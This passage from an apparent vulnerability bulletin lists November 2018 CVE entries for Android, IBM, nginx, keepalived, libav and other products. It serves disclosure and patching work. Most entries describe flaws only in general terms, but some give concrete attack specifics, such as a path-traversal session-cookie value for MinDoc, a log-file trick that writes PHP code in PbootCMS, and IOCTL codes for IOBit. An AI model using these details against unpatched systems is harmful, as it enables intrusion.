        Description: In CopyToOMX of OMXNodeInstance.cpp there is a possible out-of-bounds write due to an incorrect bounds check. This could lead to remote arbitrary code execution with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android Versions: Android-8.0 Android-8.1 Android ID: A-77486542.
        Published: 2018-11-06
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-9427 (SECTRACK, CONFIRM)

    google -- android
        Description: In get_futex_key of futex.c, there is a use-after-free due to improper locking. This could lead to local escalation of privilege with no additional privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android kernel Android ID: A-74250718 References: Upstream kernel.
        Published: 2018-11-06
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-9422 (MLIST, MLIST, CONFIRM)

    google -- android
        Description: In driver_override_store and driver_override_show of bus.c, there is a possible double free due to improper locking. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android kernel Android ID: A-69129004 References: Upstream kernel.
        Published: 2018-11-06
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-9415 (CONFIRM, UBUNTU, UBUNTU, UBUNTU)

    google -- android
        Description: In driver_override_store of bus.c, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android kernel Android ID: A-74128061 References: Upstream kernel.
        Published: 2018-11-06
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-9385 (CONFIRM)

    google -- android
        Description: In processMessagePart of InboundSmsHandler.java, there is a possible remote denial of service due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-6.0 Android-6.0.1 Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android ID: A-72298611.
        Published: 2018-11-06
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-9362 (BID, CONFIRM)

    google -- android
        Description: In getstring of ID3.cpp there is a possible out-of-bounds read due to a missing bounds check. This could lead to remote denial of service with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android Versions: Android-6.0 Android-6.0.1 Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android ID: A-78656554.
        Published: 2018-11-06
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-9437 (SECTRACK, CONFIRM)

    google -- android
        Description: In BNEP_Write of bnep_api.cc, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-6.0 Android-6.0.1 Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android ID: A-74947856.
        Published: 2018-11-06
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-9357 (BID, CONFIRM)

    google -- android
        Description: In the hidp_process_report in bluetooth, there is an integer overflow. This could lead to an out of bounds write with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android kernel Android ID: A-65853588 References: Upstream kernel.
        Published: 2018-11-06
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-9363 (REDHAT, MLIST, CONFIRM, UBUNTU, UBUNTU, DEBIAN)

    google -- android
        Description: In gatts_process_attribute_req of gatt_sc.cc, there is a possible read of uninitialized data due to a missing bounds check. This could lead to remote information disclosure in the Bluetooth process with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-6.0 Android-6.0.1 Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android ID: A-73172115.
        Published: 2018-11-06
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-9358 (BID, CONFIRM)

    google -- android
        Description: In readMetadata of Utils.cpp, there is a possible path traversal bug due to a confused deputy. This could lead to local escalation of privilege when mounting a USB device with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-6.0 Android-6.0.1 Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android ID: A-80436257.
        Published: 2018-11-06
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-9445 (SECTRACK, CONFIRM, EXPLOIT-DB)

    google -- android
        Description: In bnep_data_ind of bnep_main.c, there is a possible remote code execution due to a double free. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-6.0 Android-6.0.1 Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android ID: A-74950468.
        Published: 2018-11-06
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-9356 (BID, CONFIRM)
    google -- android
        Description: When wifi is switched, function sendNetworkStateChangeBroadcast of WifiStateMachine.java broadcasts an intent including detailed wifi network information. This could lead to information disclosure with no execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android-9.0 Android ID: A-77286245.
        Published: 2018-11-06
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-9489 (SECTRACK, MISC)

    google -- android
        Description: In process_l2cap_cmd of l2c_main.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-6.0 Android-6.0.1 Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android ID: A-74201143.
        Published: 2018-11-06
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-9360 (BID, CONFIRM)

    google -- android
        Description: In bnep_data_ind of bnep_main.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-6.0 Android-6.0.1 Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android ID: A-79164722.
        Published: 2018-11-06
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-9436 (SECTRACK, CONFIRM)

    google -- android
        Description: In hid_debug_events_read of drivers/hid/hid-debug.c, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android kernel Android ID: A-71361580.
        Published: 2018-11-06
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-9516 (MLIST, CONFIRM, DEBIAN)

    google -- android
        Description: In bnep_data_ind of bnep_main.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-6.0 Android-6.0.1 Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android ID: A-78286118.
        Published: 2018-11-06
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-9454 (SECTRACK, CONFIRM)

    google -- android
        Description: When a device connects only over WiFi VPN, the device may not receive security updates due to some incorrect checks. This could lead to a local denial of service of security updates with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android Versions: Android-8.1 Android ID: A-78644887.
        Published: 2018-11-06
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-9438 (SECTRACK, CONFIRM)

    google -- android
        Description: In computeFocusedWindow of RootWindowContainer.java, and related functions, there is possible interception of keypresses due to focus being on the wrong window. This could lead to local escalation of privilege revealing the user's keypresses while the screen was locked with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android Versions: Android-8.0 Android-8.1 Android ID: A-71786287.
        Published: 2018-11-06
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-9458 (SECTRACK, CONFIRM)

    google -- android
        Description: In avrc_proc_vendor_command of avrc_api.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-6.0 Android-6.0.1 Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android ID: A-79541338.
        Published: 2018-11-06
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-9450 (SECTRACK, CONFIRM)

    google -- android
        Description: In DynamicRefTable::load of ResourceTypes.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-6.0 Android-6.0.1 Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android ID: A-79488511.
        Published: 2018-11-06
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-9451 (SECTRACK, CONFIRM)

    google -- android
        Description: In avct_bcb_msg_ind of avct_bcb_act.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-8.0 Android-8.1 Android ID: A-79944113.
        Published: 2018-11-06
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-9448 (SECTRACK, CONFIRM)

    google -- android
        Description: In avdt_msg_prs_cfg of avdt_msg.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-6.0 Android-6.0.1 Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android ID: A-78288378.
        Published: 2018-11-06
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-9453 (SECTRACK, CONFIRM)

    google -- android
        Description: In sdpu_extract_attr_seq of sdp_utils.cc, there is a possible out of bounds read due to an incorrect bounds check. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-6.0 Android-6.0.1 Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android ID: A-78136677.
        Published: 2018-11-06
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-9455 (SECTRACK, CONFIRM)

    google -- android
        Description: In task_get_unused_fd_flags of binder.c, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android kernel Android ID: A-69164715 References: Upstream kernel.
        Published: 2018-11-06
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-9465 (SECTRACK, CONFIRM)

    google -- android
        Description: In Attachment of Attachment.java and getFilePath of EmlAttachmentProvider.java, there is a possible Elevation of Privilege due to a path traversal error. This could lead to a remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-6.0 Android-6.0.1 Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android ID: A-66230183.
        Published: 2018-11-06
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-9459 (SECTRACK, CONFIRM)

    google -- android
        Description: In process_l2cap_cmd of l2c_main.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-6.0 Android-6.0.1 Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android ID: A-74202041.
        Published: 2018-11-06
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-9361 (BID, CONFIRM)

    google -- android
        Description: In ih264d_video_decode of ih264d_api.c there is a possible resource exhaustion due to an infinite loop. This could lead to remote temporary device denial of service (remote hang or reboot) with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android Versions: Android-6.0 Android-6.0.1 Android-7.0 Android-7.1.1 Android-7.1.2 Android ID: A-63521984.
        Published: 2018-11-06
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-9444 (SECTRACK, CONFIRM)

    google -- android
        Description: In process_l2cap_cmd of l2c_main.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-6.0 Android-6.0.1 Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android ID: A-74196706.
        Published: 2018-11-06
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-9359 (BID, CONFIRM)

    google -- android
        Description: In bta_dm_sdp_result of bta_dm_act.cc, there is a possible out of bounds stack write due to a missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-6.0 Android-6.0.1 Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android ID: A-74016921.
        Published: 2018-11-06
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-9355 (BID, CONFIRM)

    google -- android
        Description: In smp_br_state_machine_event of smp_br_main.cc, there is a possible out of bounds write due to memory corruption. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-6.0 Android-6.0.1 Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android ID: A-80145946.
        Published: 2018-11-06
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-9446 (SECTRACK, CONFIRM)
    google -- cardboard_application_for_android_and_ios
        Description: The Google Cardboard application 1.8 for Android and 1.2 for iOS sends potentially private cleartext information to the Unity 3D Stats web site, as demonstrated by device make, model, and OS.
        Published: 2018-11-08
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-19111 (MISC)

    hunan_jinyun_network_technology_co -- pbootcms
        Description: PbootCMS 1.2.2 allows remote attackers to execute arbitrary PHP code by specifying a .php filename in a "SET GLOBAL general_log_file" statement, followed by a SELECT statement containing this PHP code.
        Published: 2018-11-07
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-19053 (MISC)

    i18n_gem_for_ruby_on_rails -- i18n_gem_for_ruby_on_rails
        Description: Hash#slice in lib/i18n/core_ext/hash.rb in the i18n gem before 0.8.0 for Ruby allows remote attackers to cause a denial of service (application crash) via a call in a situation where :some_key is present in keep_keys but not present in the hash.
        Published: 2018-11-06
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2014-10077 (MISC, MISC, MISC)
    ibm -- api_connect
        Description: IBM API Connect 5.0.0.0, 5.0.8.4, 2018.1 and 2018.3.6 is vulnerable to CSV injection via the developer portal and analytics that could contain malicious commands that would be executed once opened by an administrator. IBM X-Force ID: 148692.
        Published: 2018-11-08
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-1774 (XF, CONFIRM)

    ibm -- campaign
        Description: IBM Campaign 9.1.0, 9.1.2, 10.0, and 10.1 could allow an authenticated user with access to the local network to bypass security due to lack of input validation. IBM X-Force ID: 120206.
        Published: 2018-11-08
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2016-9749 (CONFIRM, XF)

    ibm -- cognos_analytics
        Description: IBM Cognos Analytics 11 Configuration tool, under certain circumstances, will bypass OIDC namespace signature verification on its id_token. IBM X-Force ID: 150902.
        Published: 2018-11-08
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-1842 (SECTRACK, XF, CONFIRM)

    ibm -- db2_for_linux_and_unix_and_windows
        Description: IBM DB2 for Linux, UNIX and Windows (includes DB2 Connect Server) 9.7, 10.1, 10.5, and 11.1 contains a vulnerability that could allow a local user to escalate their privileges to root through a symbolic link attack. IBM X-Force ID: 150511.
        Published: 2018-11-08
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-1834 (CONFIRM, XF)

    ibm -- db2_for_linux_and_unix_and_windows
        Description: IBM DB2 for Linux, UNIX and Windows (includes DB2 Connect Server) 9.7, 10.1, 10.5, and 11.1 could allow a local user to obtain root access by exploiting a symbolic link attack to read/write/corrupt a file that they originally did not have permission to access. IBM X-Force ID: 148804.
        Published: 2018-11-08
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-1781 (CONFIRM, XF)

    ibm -- db2_for_linux_and_unix_and_windows
        Description: IBM DB2 for Linux, UNIX and Windows (includes DB2 Connect Server) 9.7, 10.1, 10.5, and 11.1 binaries load shared libraries from an untrusted path, potentially giving a low privilege user full access to the DB2 instance account by loading a malicious shared library. IBM X-Force ID: 149640.
        Published: 2018-11-08
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-1802 (CONFIRM, XF)

    ibm -- db2_for_linux_and_unix_and_windows
        Description: IBM DB2 for Linux, UNIX and Windows (includes DB2 Connect Server) 9.7, 10.1, 10.5, and 11.1 could allow a local unprivileged user to overwrite files on the system which could cause damage to the database. IBM X-Force ID: 149429.
        Published: 2018-11-08
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-1799 (CONFIRM, XF)

    ibm -- db2_for_linux_and_unix_and_windows
        Description: IBM DB2 for Linux, UNIX and Windows (includes DB2 Connect Server) 11.1 could allow a user to bypass FGAC control and gain access to data they shouldn't be able to see. IBM X-Force ID: 151155.
        Published: 2018-11-08
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-1857 (CONFIRM, XF)

    ibm -- db2_for_linux_and_unix_and_windows
        Description: IBM DB2 for Linux, UNIX and Windows (includes DB2 Connect Server) 9.7, 10.1, 10.5, and 11.1 could allow a local db2 instance owner to obtain root access by exploiting a symbolic link attack to read/write/corrupt a file that they originally did not have permission to access. IBM X-Force ID: 148803.
        Published: 2018-11-08
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-1780 (CONFIRM, XF)

    ibm -- marketing_operations
        Description: IBM Marketing Operations 9.1.0, 9.1.2, and 10.1 could allow a remote attacker to obtain sensitive information. An attacker could send a specially-crafted request to cause an error message to be returned containing the full root path. An attacker could use this information to launch further attacks against the affected system. IBM X-Force ID: 121171.
        Published: 2018-11-08
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2017-1119 (CONFIRM, XF)

    ibm -- maximo_asset_management
        Description: IBM Maximo Asset Management 7.6 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI, thus altering the intended functionality and potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 151330.
        Published: 2018-11-09
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-1872 (XF, CONFIRM)

    ibm -- multiple_products
        Description: IBM Jazz applications (IBM Rational Collaborative Lifecycle Management 5.0 through 5.02 and 6.0 through 6.0.6, IBM Rational DOORS Next Generation 5.0 through 5.02 and 6.0 through 6.0.6, IBM Rational Engineering Lifecycle Manager 5.0 through 5.02 and 6.0 through 6.0.6, IBM Rational Quality Manager 5.0 through 5.02 and 6.0 through 6.0.6, IBM Rational Rhapsody Design Manager 5.0 through 5.02 and 6.0 through 6.0.6, IBM Rational Software Architect Design Manager 5.0 through 5.02 and 6.0 through 6.0.1, IBM Rational Team Concert 5.0 through 5.02 and 6.0 through 6.0.6) could allow a remote attacker to obtain sensitive information, caused by the failure to properly enable HTTP Strict Transport Security. An attacker could exploit this vulnerability to obtain sensitive information using man in the middle techniques. IBM X-Force ID: 145609.
        Published: 2018-11-06
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-1694 (CONFIRM, XF)

    ibm -- multiple_products
        Description: IBM Jazz based applications (IBM Rational Collaborative Lifecycle Management 5.0 through 5.02 and 6.0 through 6.0.6, IBM Rational DOORS Next Generation 5.0 through 5.02 and 6.0 through 6.0.6, IBM Rational Engineering Lifecycle Manager 5.0 through 5.02 and 6.0 through 6.0.6, IBM Rational Quality Manager 5.0 through 5.02 and 6.0 through 6.0.6, IBM Rational Rhapsody Design Manager 5.0 through 5.02 and 6.0 through 6.0.6, IBM Rational Software Architect Design Manager 5.0 through 5.02 and 6.0 through 6.0.1, IBM Rational Team Concert 5.0 through 5.02 and 6.0 through 6.0.6) could allow an authenticated user to obtain sensitive information from an error message that could be used in further attacks against the system. IBM X-Force ID: 143796.
        Published: 2018-11-06
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-1606 (CONFIRM, XF)

    ibm -- spectrum_protect_server
        Description: IBM Spectrum Protect Server 7.1 and 8.1 could disclose highly sensitive information via trace logs to a local privileged user. IBM X-Force ID: 148873.
        Published: 2018-11-02
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-1788 (CONFIRM, BID, SECTRACK, XF)

    ibm -- websphere_mq
        Description: IBM WebSphere MQ 8.0 through 9.1 is vulnerable to an error with MQTT topic string publishing that can cause a denial of service attack. IBM X-Force ID: 145456.
        Published: 2018-11-08
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-1684 (XF, CONFIRM)
    international_components_for_unicode -- international_components_for_unicode
        Description: International Components for Unicode (ICU) for C/C++ 63.1 has an integer overflow in number::impl::DecimalQuantity::toScientificString() in i18n/number_decimalquantity.cpp.
        Published: 2018-11-04
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-18928 (MISC, MISC, MISC)

    iobit -- malware_fighter
        Description: RegFilter.sys in IOBit Malware Fighter 6.2 is susceptible to a stack-based buffer overflow when an attacker uses IOCTL 0x8006E040 with a size larger than 8 bytes. This can lead to denial of service or code execution with root privileges.
        Published: 2018-11-09
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-19086 (MISC)

    iobit -- malware_fighter
        Description: RegFilter.sys in IOBit Malware Fighter 6.2 is susceptible to a stack-based buffer overflow when an attacker uses IOCTL 0x8006E048 with a size larger than 8 bytes. This can lead to denial of service or code execution with root privileges.
        Published: 2018-11-09
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-19085 (MISC)

    iobit -- malware_fighter
        Description: RegFilter.sys in IOBit Malware Fighter 6.2 is susceptible to a stack-based buffer overflow when an attacker uses IOCTL 0x8006E05C with a size larger than 8 bytes. This can lead to denial of service or code execution with root privileges.
        Published: 2018-11-09
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-19084 (MISC)

    iobit -- malware_fighter
        Description: RegFilter.sys in IOBit Malware Fighter 6.2 is susceptible to a stack-based buffer overflow when an attacker uses IOCTL 0x8006E044 with a size larger than 8 bytes. This can lead to denial of service or code execution with root privileges.
        Published: 2018-11-09
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-19087 (MISC)

    jasper -- jasper
        Description: An issue has been found in JasPer 2.0.14. There is a memory leak in jas_malloc.c when called from jpc_unk_getparms in jpc_cs.c.
        Published: 2018-11-09
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-19139 (MISC)

    jeecms -- jeecms
        Description: JEECMS 9.3 has XSS via an index.do#/content/update?type=update URI.
        Published: 2018-11-05
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-18952 (MISC)

    jquery -- jquery
        Description: Unauthenticated arbitrary file upload vulnerability in jQuery Picture Cut <= v1.1Beta.
        Published: 2018-11-05
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-9208 (MISC)
    keepalived -- keepalived
        Description: keepalived 2.0.8 used mode 0666 when creating new temporary files upon a call to PrintData or PrintStats, potentially leaking sensitive information.
        Published: 2018-11-08
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-19045 (MISC, MISC, MISC, MISC)

    keepalived -- keepalived
        Description: keepalived 2.0.8 didn't check for pathnames with symlinks when writing data to a temporary file upon a call to PrintData or PrintStats. This allowed local users to overwrite arbitrary files if fs.protected_symlinks is set to 0, as demonstrated by a symlink from /tmp/keepalived.data or /tmp/keepalived.stats to /etc/passwd.
        Published: 2018-11-08
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-19044 (MISC, MISC, MISC)

    keepalived -- keepalived
        Description: keepalived 2.0.8 didn't check for existing plain files when writing data to a temporary file upon a call to PrintData or PrintStats. If a local attacker had previously created a file with the expected name (e.g., /tmp/keepalived.data or /tmp/keepalived.stats), with read access for the attacker and write access for the keepalived process, then this potentially leaked sensitive information.
        Published: 2018-11-08
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-19046 (MISC, MISC)

    keepalived -- keepalived
        Description: keepalived before 2.0.7 has a heap-based buffer overflow when parsing HTTP status codes resulting in DoS or possibly unspecified other impact, because extract_status_code in lib/html.c has no validation of the status code and instead writes an unlimited amount of data to the heap.
        Published: 2018-11-08
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-19115 (MISC, MISC, MISC)
    kindeditor -- kindeditor
        Description: KindEditor through 4.1.11 has a path traversal vulnerability in php/upload_json.php. Anyone can browse a file or directory in the kindeditor/attached/ folder via the path parameter without authentication.
        Published: 2018-11-05
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-18950 (MISC)

    knightjs -- knightjs
        Description: A Path Traversal in Knightjs versions <= 0.0.1 allows an attacker to read content of arbitrary files on a remote server.
        Published: 2018-11-06
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-16475 (MISC)

    libav -- libav
        Description: In Libav 12.3, there is a heap-based buffer over-read in decode_frame in libavcodec/lcldec.c that allows an attacker to cause denial-of-service via a crafted avi file.
        Published: 2018-11-09
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-19128 (MISC)

    libav -- libav
        Description: In Libav 12.3, there is an invalid memory access in vc1_decode_frame in libavcodec/vc1dec.c that allows attackers to cause a denial-of-service via a crafted aac file.
        Published: 2018-11-09
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-19130 (MISC)

    libav -- libav
        Description: In Libav 12.3, a NULL pointer dereference (RIP points to zero) issue in ff_mpa_synth_filter_float in libavcodec/mpegaudiodsp_template.c can cause a segmentation fault (application crash) via a crafted mov file.
        Published: 2018-11-09
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-19129 (MISC)

    libiec61850 -- libiec61850
        Description: An issue has been found in libIEC61850 v1.3. It is a NULL pointer dereference in Ethernet_sendPacket in ethernet_bsd.c.
        Published: 2018-11-09
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-19122 (MISC, MISC)

    libiec61850 -- libiec61850
        Description: An issue has been found in libIEC61850 v1.3. It is a NULL pointer dereference in ClientDataSet_getValues in client/ied_connection.c.
        Published: 2018-11-05
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-18937 (MISC, MISC)

    libiec61850 -- libiec61850
        Description: An issue has been found in libIEC61850 v1.3. It is a SEGV in Ethernet_receivePacket in ethernet_bsd.c.
        Published: 2018-11-09
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-19121 (MISC, MISC)

    libiec61850 -- libiec61850
        Description: An issue has been found in libIEC61850 v1.3. It is a stack-based buffer overflow in prepareGooseBuffer in goose/goose_publisher.c.
        Published: 2018-11-05
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-18957 (MISC, EXPLOIT-DB)
    librecad -- librecad
        Description: LibreCAD 2.1.3 allows remote attackers to cause a denial of service (0x89C04589 write access violation and application crash) or possibly have unspecified other impact via a crafted file.
        Published: 2018-11-08
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-19105 (MISC)

    light_code_labs -- caddy
        Description: Caddy through 0.11.0 sends incorrect certificates for certain invalid requests, making it easier for attackers to enumerate hostnames. Specifically, when unable to match a Host header with a vhost in its configuration, it serves the X.509 certificate for a randomly selected vhost in its configuration. Repeated requests (with a nonexistent hostname in the Host header) permit full enumeration of all certificates on the server. This generally permits an attacker to easily and accurately discover the existence of and relationships among hostnames that weren't meant to be public, though this information could likely have been discovered via other methods with additional effort.
        Published: 2018-11-10
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-19148 (MISC, MISC, MISC)

    lighttpd -- lighttpd
        Description: An issue was discovered in mod_alias_physical_handler in mod_alias.c in lighttpd before 1.4.50. There is potential ../ path traversal of a single directory above an alias target, with a specific mod_alias configuration where the matched alias lacks a trailing '/' character, but the alias target filesystem path does have a trailing '/' character.
        Published: 2018-11-07
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-19052 (MISC)

    metinfo -- metinfo
        Description: MetInfo 6.1.3 has XSS via the admin/index.php?a=dogetpassword abt_type parameter.
        Published: 2018-11-06
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-19051 (MISC)

    metinfo -- metinfo
        Description: MetInfo 6.1.3 has XSS via the admin/index.php?a=dogetpassword langset parameter.
        Published: 2018-11-06
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-19050 (MISC)

    micro_focus -- operations_bridge
        Description: A potential remote code execution and information disclosure vulnerability exists in Micro Focus Operations Bridge containerized suite versions 2017.11, 2018.02, 2018.05, 2018.08. This vulnerability could allow for information disclosure.
        Published: 2018-11-07
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-18590 (CONFIRM)

    mindoc -- mindoc
        Description: An issue was discovered in MinDoc through v1.0.2. It allows attackers to gain privileges by uploading an image file with contents that represent an admin session, and then sending a Cookie: header with a mindoc_id value containing the relative pathname of this uploaded file. For example, the mindoc_id (aka session ID) could be of the form aa/../../uploads/blog/201811/attach_#.jpg where '#' is a hex value displayed in the upload field of a manage/blogs/edit/ screen.
        Published: 2018-11-08
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-19114 (MISC)
    nginx -- nginx
        Description: nginx before versions 1.15.6 and 1.14.1 has a vulnerability in the implementation of HTTP/2 that can allow for excessive CPU usage. This issue affects nginx compiled with the ngx_http_v2_module (not compiled by default) if the 'http2' option of the 'listen' directive is used in a configuration file.
        Published: 2018-11-07
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-16844 (MISC, BID, SECTRACK, CONFIRM, UBUNTU, DEBIAN)

    nginx -- nginx
        Description: nginx before versions 1.15.6 and 1.14.1 has a vulnerability in the ngx_http_mp4_module, which might allow an attacker to cause an infinite loop in a worker process, cause a worker process crash, or might result in worker process memory disclosure by using a specially crafted mp4 file. The issue only affects nginx if it is built with the ngx_http_mp4_module (the module is not built by default) and the 'mp4' directive is used in the configuration file. Further, the attack is only possible if an attacker is able to trigger processing of a specially crafted mp4 file with the ngx_http_mp4_module.
        Published: 2018-11-07
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-16845 (MISC, BID, SECTRACK, CONFIRM, MLIST, UBUNTU, DEBIAN)

    nginx -- nginx
